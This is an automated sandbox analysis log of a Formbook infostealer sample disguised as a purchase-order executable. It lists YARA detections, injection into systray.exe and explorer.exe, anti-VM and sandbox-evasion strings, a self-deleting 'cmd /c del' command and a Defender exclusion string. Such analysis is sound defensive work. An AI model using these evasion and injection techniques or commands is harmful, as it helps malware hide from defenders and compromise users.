          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9770 NtSetInformationFile,14_2_050B9770
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B97A0 NtUnmapViewOfSection,14_2_050B97A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9610 NtEnumerateValueKey,14_2_050B9610
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9670 NtQueryInformationProcess,14_2_050B9670
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9950 NtQueueApcThread,14_2_050B9950
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B99D0 NtCreateProcessEx,14_2_050B99D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9820 NtEnumerateKey,14_2_050B9820
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050BB040 NtSuspendThread,14_2_050BB040
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B98A0 NtWriteVirtualMemory,14_2_050B98A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B98F0 NtReadVirtualMemory,14_2_050B98F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9B00 NtSetValueKey,14_2_050B9B00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050BA3B0 NtGetContextThread,14_2_050BA3B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9A00 NtProtectVirtualMemory,14_2_050B9A00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9A10 NtQuerySection,14_2_050B9A10
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9A20 NtResumeThread,14_2_050B9A20
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B9A80 NtOpenDirectoryObject,14_2_050B9A80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E83A0 NtAllocateVirtualMemory,14_2_030E83A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E8270 NtReadFile,14_2_030E8270
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E82F0 NtClose,14_2_030E82F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E81C0 NtCreateFile,14_2_030E81C0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E839A NtAllocateVirtualMemory,14_2_030E839A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E826A NtReadFile,14_2_030E826A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E82EA NtClose,14_2_030E82EA
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E81BA NtCreateFile,14_2_030E81BA
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 0507B150 appears 35 times
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: String function: 00EAB150 appears 35 times
          Source: PO-RFQ # 097663899.exeBinary or memory string: OriginalFilename vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.260803980.0000000007560000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll" vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251630889.000000000307C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll2 vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.249957275.0000000001198000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exe, 00000004.00000002.295144212.0000000000BE8000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamesystray.exej% vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exe, 00000004.00000002.295297599.0000000000F9F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exeBinary or memory string: OriginalFilenameUrl.exeB vs PO-RFQ # 097663899.exe
          Source: PO-RFQ # 097663899.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: PO-RFQ # 097663899.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@14/8
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-RFQ # 097663899.exe.log
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:800:120:WilError_01
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: PO-RFQ # 097663899.exeVirustotal: Detection: 30%
          Source: PO-RFQ # 097663899.exeReversingLabs: Detection: 27%
          Source: unknownProcess created: C:\Users\user\Desktop\PO-RFQ # 097663899.exe 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess created: C:\Users\user\Desktop\PO-RFQ # 097663899.exe C:\Users\user\Desktop\PO-RFQ # 097663899.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess created: C:\Users\user\Desktop\PO-RFQ # 097663899.exe C:\Users\user\Desktop\PO-RFQ # 097663899.exeJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'Jump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: PO-RFQ # 097663899.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO-RFQ # 097663899.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: systray.pdb source: PO-RFQ # 097663899.exe, 00000004.00000002.295144212.0000000000BE8000.00000004.00000020.sdmp
          Source: Binary string: systray.pdbGCTL source: PO-RFQ # 097663899.exe, 00000004.00000002.295144212.0000000000BE8000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO-RFQ # 097663899.exe, 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, systray.exe, 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO-RFQ # 097663899.exe, systray.exe
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004150D0 push ebp; iretd 4_2_004150D1
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00408A04 push esi; ret 4_2_00408A05
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00415BF3 pushfd ; ret 4_2_00415BF4
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B3B5 push eax; ret 4_2_0041B408
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B46C push eax; ret 4_2_0041B472
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B402 push eax; ret 4_2_0041B408
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041B40B push eax; ret 4_2_0041B472
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041559C push edx; retf 4_2_004155BA
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_0041BF6A push ecx; ret 4_2_0041C07B
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004157F7 push ss; ret 4_2_0041580C
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EFD0D1 push ecx; ret 4_2_00EFD0E4
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050CD0D1 push ecx; ret 14_2_050CD0E4
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB3B5 push eax; ret 14_2_030EB408
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E5BF3 pushfd ; ret 14_2_030E5BF4
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030D8A04 push esi; ret 14_2_030D8A05
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E50D0 push ebp; iretd 14_2_030E50D1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EBFD3 push ecx; ret 14_2_030EC07B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E57F7 push ss; ret 14_2_030E580C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030E559C push edx; retf 14_2_030E55BA
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB40B push eax; ret 14_2_030EB472
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB402 push eax; ret 14_2_030EB408
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_030EB46C push eax; ret 14_2_030EB472
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85500503575
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara matchFile source: 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PO-RFQ # 097663899.exe PID: 5964, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000030D85E4 second address: 00000000030D85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000030D897E second address: 00000000030D8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004088B0 rdtsc 4_2_004088B0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exe TID: 5988Thread sleep time: -101015s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exe TID: 4896Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6300Thread sleep time: -55000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\systray.exe TID: 5344Thread sleep time: -42000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeThread delayed: delay time: 101015Jump to behavior
          Source: explorer.exe, 00000006.00000000.277718252.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000006.00000000.260289089.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.277238129.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.260342638.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000006.00000002.494269360.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.277772773.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000006.00000002.506618917.00000000053D7000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000006.00000000.277238129.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000006.00000000.277238129.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000006.00000000.277772773.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000006.00000000.277238129.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_004088B0 rdtsc 4_2_004088B0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00409B20 LdrLoadDll,4_2_00409B20
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26CF0 mov eax, dword ptr fs:[00000030h]4_2_00F26CF0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED4D3B mov eax, dword ptr fs:[00000030h]4_2_00ED4D3B
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED4D3B mov eax, dword ptr fs:[00000030h]4_2_00ED4D3B
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED513A mov eax, dword ptr fs:[00000030h]4_2_00ED513A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED513A mov eax, dword ptr fs:[00000030h]4_2_00ED513A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAAD30 mov eax, dword ptr fs:[00000030h]4_2_00EAAD30
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9100 mov eax, dword ptr fs:[00000030h]4_2_00EA9100
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9100 mov eax, dword ptr fs:[00000030h]4_2_00EA9100
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9100 mov eax, dword ptr fs:[00000030h]4_2_00EA9100
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB76E2 mov eax, dword ptr fs:[00000030h]4_2_00EB76E2
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2AE4 mov eax, dword ptr fs:[00000030h]4_2_00ED2AE4
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED16E0 mov ecx, dword ptr fs:[00000030h]4_2_00ED16E0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F78ED6 mov eax, dword ptr fs:[00000030h]4_2_00F78ED6
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED36CC mov eax, dword ptr fs:[00000030h]4_2_00ED36CC
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2ACB mov eax, dword ptr fs:[00000030h]4_2_00ED2ACB
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE8EC7 mov eax, dword ptr fs:[00000030h]4_2_00EE8EC7
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F5FEC0 mov eax, dword ptr fs:[00000030h]4_2_00F5FEC0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA52A5 mov eax, dword ptr fs:[00000030h]4_2_00EA52A5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA52A5 mov eax, dword ptr fs:[00000030h]4_2_00EA52A5
